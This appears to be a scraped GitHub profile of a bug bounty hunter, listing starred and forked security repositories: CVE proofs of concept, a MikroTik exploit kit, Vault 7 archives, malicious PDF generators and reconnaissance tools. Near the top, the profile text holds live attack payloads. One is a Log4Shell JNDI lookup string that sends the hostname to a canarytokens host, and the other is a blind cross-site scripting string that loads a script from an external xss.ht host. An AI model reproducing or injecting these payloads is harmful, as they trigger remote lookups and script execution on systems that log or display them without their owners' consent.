-
Ethical Hacker | Bug Bounty Hunter
- internet
- https://www.youtube.com/@SaFiSec
Lists (2)
Sort Name ascending (A-Z)
${jndi:ldap://x${hostName}.L4J.g
${jndi:ldap://x${hostName}.L4J.gl1skm6ziftyeuu34r6ekt6lf.canarytokens.com/a}'>"></title></style></textarea>
'>"></title></style></textarea></script><script/src="><script src=https://tr33.xss.ht></script>/js></script> '>"></title></style></textarea></script><"><scripStarred repositories
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
CVE-2024-4367 & CVE-2024-34342 Proof of Concept
List of free GPTs that doesn't require plus subscription
acunetix-13 install in kali linux
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way …
Top disclosed reports from HackerOne
Asset inventory of over 800 public bug bounty programs.
SaFiSec / Chimay-Red
Forked from seekintoo/Chimay-RedMikrotik RouterOS (6.x < 6.38.5) exploit kit. Reverse engineered from the "Vault 7" WikiLeaks publication.
SaFiSec / Vault-7
Forked from DarrenRainey/Vault-7A Public available archive of the leaked Vault 7 archive files
A Public available archive of the leaked Vault 7 archive files
WikiLeaks Vault 7 CIA Hacking Tools
PoC for iTerm2 CVEs CVE-2024-38396 and CVE-2024-38395 which allow code execution
gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...
AI-Powered Automated Penetration Testing Tool
The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving to…
Community curated list of templates for the nuclei engine to find security vulnerabilities.
lovelyboss / Awesome-Dorks
Forked from 0xPugal/Awesome-DorksDorks for Bug Bounty Hunting
Dorks for shodan.io. Some basic shodan dorks collected from publicly available data.
This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.
SaFiSec / Bad-Pdf
Forked from deepzec/Bad-PdfSteal Net-NTLM Hash using Bad-PDF
SaFiSec / malicious-pdf
Forked from jonaslejon/malicious-pdf💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh